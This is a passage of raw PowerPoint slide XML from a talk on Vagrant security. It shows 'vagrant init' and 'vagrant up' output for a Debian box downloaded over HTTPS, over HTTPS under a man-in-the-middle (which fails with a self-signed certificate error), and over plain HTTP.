                <a:spcPts val="275"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>init &lt;box&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0"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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>url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]</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="22860">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-145" dirty="0"/>
              <a:t>Connection </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-165" dirty="0"/>
              <a:t>over</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-220" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-150" dirty="0"/>
              <a:t>HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="22860">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="275"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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debian/jessie64</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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up</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286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Bringing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>machine 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’default’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>up with 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’virtualbox’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill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provider...</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="100330" marR="1440815" indent="-78105">
              <a:lnSpc>
                <a:spcPts val="1100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box 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’debian/jessie64’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>could not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>found.  default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Provider:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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virtualbox</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="100330">
              <a:lnSpc>
                <a:spcPts val="1050"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box Version: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt;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=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill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1A177D"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="100965" marR="1331595" indent="-78105">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: Loading metadata </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box 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’debian/jessie64’  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>default: URL:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-45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https://vagrantcloud.com/debian/jessie64</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Adding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box 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’debian/jessie64’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>provider:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="1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virtualbox</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="100330">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="20"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>default: Downloading:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="7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https://atlas.hashicorp.com/debian/jessie64/virtualbox.box</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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5" dirty="0"/>
              <a:t>36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17" y="190436"/>
            <a:ext cx="19323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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-260" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-175" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INIT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89" y="774084"/>
            <a:ext cx="3731895" cy="204723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100" spc="-204" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Command: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900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>init &lt;box&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0"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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>url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]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100" spc="-145" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>Connection </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>over </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-150" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>HTTPS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-229" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-165" dirty="0">
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>(MiM)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900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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debian/jessie64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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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up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Bringing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>machine 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’default’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>up with 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’virtualbox’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill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provider...</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="784225" indent="-78105">
              <a:lnSpc>
                <a:spcPts val="1100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="35"/>
              </a:spcBef>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box 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’debian/jessie64’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>could not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>be </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>found...  default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Provider:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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virtualbox</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805">
              <a:lnSpc>
                <a:spcPts val="1050"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box Version: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt;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=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill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1A177D"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="90805" marR="5080" indent="-78105">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Adding </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>box 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’debian/jessie64’ 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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>v0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) </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="007F00"/>
                </a:solidFill>
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>provider: virtualbox  default: Downloading:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15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https://vagrantcloud.com/debian/jessie64</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="389890">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>SSL </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="20" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>certiicate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>problem: self signed </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="20" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>certiicate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="20" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>certiicate </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>chain  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>More details here:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="5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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://curl.haxx.se/docs/sslcerts.html</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9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5" dirty="0"/>
              <a:t>37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17" y="190436"/>
            <a:ext cx="19323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>
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>THE SECURITY </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-215" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>VAGRANT</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-260" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-175" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20074"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>INIT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385"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-204" dirty="0"/>
              <a:t>Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="22860">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>init &lt;box&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" dirty="0"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[</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>url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]</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="22860">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="335"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-145" dirty="0"/>
              <a:t>Connection </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-165" dirty="0"/>
              <a:t>over</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-220" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-140" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="22860">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="240"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>init debian/jessie64</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="90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  <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://vagrantcloud.com/debian/jessie64</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>vagrant</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-1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up</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="2286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Bringing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-10" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>machine 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’default’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>up with 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’virtualbox’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="BA2121"/>
                </a:solidFill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provider...</a:t>
            </a:r>
            <a:endParaRPr sz="900">
              <a:latin typeface="LM Roman 9"/>
              <a:cs typeface="LM Roman 9"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="100330" marR="1376045" indent="-78105">
              <a:lnSpc>
                <a:spcPct val="101499"/>
              </a:lnSpc>
            </a:pP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==</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>&gt; default: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-15" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>Box 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’debian/jessie64’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="-5" dirty="0">
                <a:latin typeface="LM Roman 9"/>
                <a:cs typeface="LM Roman 9"/>
              </a:rPr>
              <a:t>could not </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="900" spc="10" dirty="0">
